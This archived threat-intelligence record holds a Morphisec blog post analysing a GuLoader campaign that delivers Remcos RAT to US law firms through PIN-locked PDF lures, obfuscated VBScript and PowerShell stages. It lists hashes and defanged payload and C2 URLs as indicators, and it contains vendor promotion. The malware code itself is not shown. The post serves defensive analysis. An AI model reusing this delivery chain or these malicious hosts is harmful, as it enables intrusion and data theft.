{
	"id": "233dc5ca-9f53-4750-9819-b98bf2e1f27e",
	"created_at": "2026-04-06T00:13:52.863113Z",
	"updated_at": "2026-04-10T03:19:59.048444Z",
	"deleted_at": null,
	"sha1_hash": "000dfc7e32d8968276f3a27584555a7211b7e5fd",
	"title": "GuLoader Campaign Targets Law Firms in the US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1945928,
	"plain_text": "GuLoader Campaign Targets Law Firms in the US\r\nBy Arnold Osipov\r\nArchived: 2026-04-05 18:12:39 UTC\r\nSince April, Morphisec Labs has been closely monitoring an active GuLoader campaign that primarily focuses on\r\nlaw firms, along with healthcare and investment firms, specifically within the United States. GuLoader, also\r\nknown as Cloudeye, has been active for over three years, continuously evolving over time. Its developers employ\r\na range of anti-analysis techniques, making it challenging for security researchers to analyze.\r\nGuLoader has gained notoriety for its role in distributing numerous malware families, including NetWire, Lokibot,\r\nXloader, Remcos, and others. It employs legitimate hosting services such as Google Drive, OneDrive, GCloud,\r\nand more to download the payload. In the campaign covered in this blog post, threat actors leveraged GuLoader to\r\ndeliver Remcos RAT (remote access trojan) by utilizing `github.io` as the source for downloading the payload.\r\nGuLoader Targeted sectors.\r\nInfection Chain\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 1 of 8\n\nThe PDF attachment appears to be locked and protected with a PIN, which the sender conveniently provides in the\r\nemail. The lure message within the PDF suggests that the file needs to be decrypted for viewing. To initiate the\r\ndecryption process, the victim is enticed to click on an icon embedded within the PDF.\r\nFigure: PDF lures to click the icon and download payload.\r\nThis icon contains an embedded link, which once clicked, redirects the user to the final URL by utilizing a popular\r\nadclick service called DoubleClick, which is provided by Google. DoubleClick is widely used in online\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 2 of 8\n\nadvertising and offers various capabilities, including the ability to track and gather statistics and metadata\r\ninformation on user clicks. In this context, it is likely employed by the threat actors to gain insights into the\r\neffectiveness of their malicious campaign. The redirected URL in the chain prompts the user to enter the PIN that\r\nwas previously sent via email. Once the PIN is provided, a GuLoader VBScript is downloaded, marking the next\r\nstage of the attack.\r\nFigure: GuLoader VBScript download page secured with password.\r\nThe GuLoader VBScript is obfuscated and has junk code with random comments—this is how the code looks\r\nafter omitting the redundant lines. The following script will decode and execute a Powershell script.\r\nFigure: GuLoader VBScript.\r\nThe Powershell script will decode and execute a 2nd stage Powershell script using the 32-bit version of\r\nPowershell, as the GuLoader shellcode is 32-bit based.\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 3 of 8\n\nFigure: First stage Powershell script.\r\nThe 2nd stage Powershell script contains XOR encoded strings that contain the logical code that is responsible for\r\ndownloading the GuLoader shellcode.\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 4 of 8\n\nFigure: Obfuscated second stage Powershell script.\r\nThis is a de-obfuscated, simplified form of the script, which downloads the GuLoader shellcode from `github.io`\r\ndomain, base64 decodes it, and splits it into two parts:\r\n1. Decrypting shellcode\r\n2. Encrypted shellcode\r\nNext, the shellcode is invoked by passing it as a callback function to `CallWindowProcA` along with the\r\nencrypted shellcode and `NtProtectVirtualMemory` as arguments.\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 5 of 8\n\nFigure: Deobfuscated second stage Powershell script.\r\nThe GuLoader shellcode was reviewed in previous blog posts, and will not be covered in depth here.\r\nFundamentally, the shellcode is responsible for downloading, decrypting and injecting the final payload into\r\n`ieinstal.exe` process. Including downloading and opening a decoy pdf that shows a page not found error while the\r\nmalicious Remcos RAT is running in the background.\r\nFigure: Lure PDF while payload is running in the background.\r\nGuLoader is appearing more frequently as a malware loader in phishing campaigns. It’s one of the most advanced\r\ndownloaders currently in use, and often downloads its payload from cloud hosting platforms. This campaign was a\r\nregular URL, however. Morphisec provides full protection against these and other malware loaders, such as\r\nInvalidPrinter.\r\nHow Morphisec Helps\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 6 of 8\n\nMorphisec’s Automated Moving Target Detection (AMTD) technology uses a preventative approach to\r\ncybersecurity, using an ultra-lightweight agent to block unauthorized processes (like GuLoader) deterministically,\r\nrather than probabilistically. Morphisec AMTD secures runtime memory and critical infrastructure, preventing\r\nunauthorized code from executing, regardless of whether a recognizable signature or behavior pattern exists. This\r\nprotection extends to remote employees as well, and we encourage everyone to see Morphisec AMTD in action\r\nand how it protects critical systems against cyberattack.\r\nThe combination of detection-based tools with Moving Target Defense creates the most effective defense-in-depth\r\nagainst threats like GuLoader. To learn more, read the  white paper: Zero Trust + Moving Target Defense: The\r\nUltimate Ransomware Strategy.\r\nIndicators of Compromise (IOCs)\r\nPDF Files\r\n06b3c92f9718da323c4d3a18d69629696dc5f799a7ddaef4e7415d117b345af4\r\n2438bfe409fb32b18fca95f95fff85a778502553ce627d0f25e54653c84e0e0c\r\n8ef6d783f8aaffffdecfa13bcc20b4f1a18f6c4c3c4cc22e93fb5c8d753ca338\r\n584f1b20d6a1939933663dd57e13603c7fe664f81a117f0d5456b4d448506b7d\r\n3c5d19be4d5e1f600c31f837b9650ad8c7508d6691f6cd4889d2178809703de7\r\na8f7f8900375ad8d2fda626f098cdda95bb4e42855cbae91c290d3f020bfd45f\r\n7add364a2a13388cc035e5f082f7adbb76c1e60d82748acd3eb30d6c9b3ce5be\r\na66b1a9fcf5d5fecd53152ecf68be150028109f484ad349d7029d72b3c5c9564\r\nVBS\r\na3855846b501325a4b11cbc27fac9f845a56c91e088edbd75fb5ab651f913ede\r\n60d70005c38b331cd46b8af0f8e3d8cf181bdf43fb685a1962b1e26e085a6e2a\r\n2d343c091484eac696a23418f04df81c35bc538a10d25193ad014d11c4422907\r\nf78e18ae09d30f4062de466afb5e1de5041b6cda445b15a3cca912a3294f731a\r\nd63a863c26d03016ece637cd34c0f93efa1fe691b4328c7a915ef3c07ae1811f\r\n0873011390fd1d2dce527a726607255693c306774dfed8ac6b5b88efd4920d48\r\nc766754790aaf298acbf85229096d8f0493fa9ee64d429facd425e30ceceaa4b\r\n2ba636d017b5df7a706b4dfede215733807fff6db5fea202e4a5b6bf515ba8b4\r\na86c6baa5323f07155cf414cdfd667216fb2816ec999ad240042c78b86175492\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 7 of 8\n\nURLs\r\nquickcheckx[.]github.io/quickme/Udgan.u32\r\nquickcheckx[.]github.io/quickme/KmJiw22.bin\r\nquickcheckx[.]github.io/quickme/Panzersti.lpk\r\nquickcheckx[.]github.io/quickme/XbuLYedqxf70.bin\r\nzeusblog[.]cloud/Adobe.pdf\r\nC2\r\napdfhost[.]online\r\nAbout the author\r\nArnold Osipov\r\nMalware Researcher\r\nArnold Osipov is a Malware Researcher at Morphisec, who has spoken at BlackHat and and been recognized by\r\nMicrosoft Security for his contributions to malware research related to Microsoft Office. Prior to his arrival at\r\nMorphisec 6 years ago, Arnold was a Malware Analyst at Check Point.\r\nSource: https://blog.morphisec.com/guloader-the-rat-downloader\r\nhttps://blog.morphisec.com/guloader-the-rat-downloader\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.morphisec.com/guloader-the-rat-downloader"
	],
	"report_names": [
		"guloader-the-rat-downloader"
	],
	"threat_actors": [],
	"ts_created_at": 1775434432,
	"ts_updated_at": 1775791199,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/000dfc7e32d8968276f3a27584555a7211b7e5fd.pdf",
		"text": "https://archive.orkl.eu/000dfc7e32d8968276f3a27584555a7211b7e5fd.txt",
		"img": "https://archive.orkl.eu/000dfc7e32d8968276f3a27584555a7211b7e5fd.jpg"
	}
}